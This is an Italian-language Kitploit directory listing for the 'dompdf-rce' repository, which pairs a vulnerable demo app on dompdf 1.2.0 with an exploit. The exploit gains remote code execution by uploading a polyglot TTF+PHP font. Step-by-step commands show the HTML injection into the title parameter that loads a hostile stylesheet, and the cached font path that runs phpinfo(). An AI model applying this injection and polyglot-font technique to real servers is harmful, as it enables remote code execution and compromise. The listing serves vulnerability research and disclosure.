Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
dompdf-rce — Exploit RCE per dompdf | Kitploit
Strumenti/GitHubGitHub/positive-security/dompdf-rce
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingSviluppo Payload
GitHubpositive-security/dompdf-rce

dompdf-rce

Exploit RCE per dompdf

Vedi Repository
179654 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit RCE per dompdf

Questo repository contiene un'applicazione demo vulnerabile che utilizza dompdf 1.2.0 e un exploit che consente l'esecuzione remota di codice tramite un file poliglotta ttf+php.

Panoramica dell'exploit

Per maggiori dettagli, visita https://positive.security/blog/dompdf-rce

Istruzioni

  1. Esegui l'applicazione demo
root@kitploit:~
$ cd application
$ php -S localhost:9000
  1. Esegui il server dell'exploit
root@kitploit:~
$ cd exploit
$ php -S localhost:9001
  1. Attiva l'exploit
root@kitploit:~
http://localhost:9000/index.php?pdf&title=<link rel=stylesheet href='http://localhost:9001/exploit.css'>
  1. Accedi al file "font" php memorizzato nella cache ed esegui phpinfo()
root@kitploit:~
http://localhost:9000/dompdf/lib/fonts/exploitfont_normal_3f83639933428d70e74a061f39009622.php

Nota: Se stai utilizzando domini o porte diversi, modifica exploit/exploit.css di conseguenza e controlla application/dompdf/lib/fonts per il nome completo del file font.

Scarica lo strumento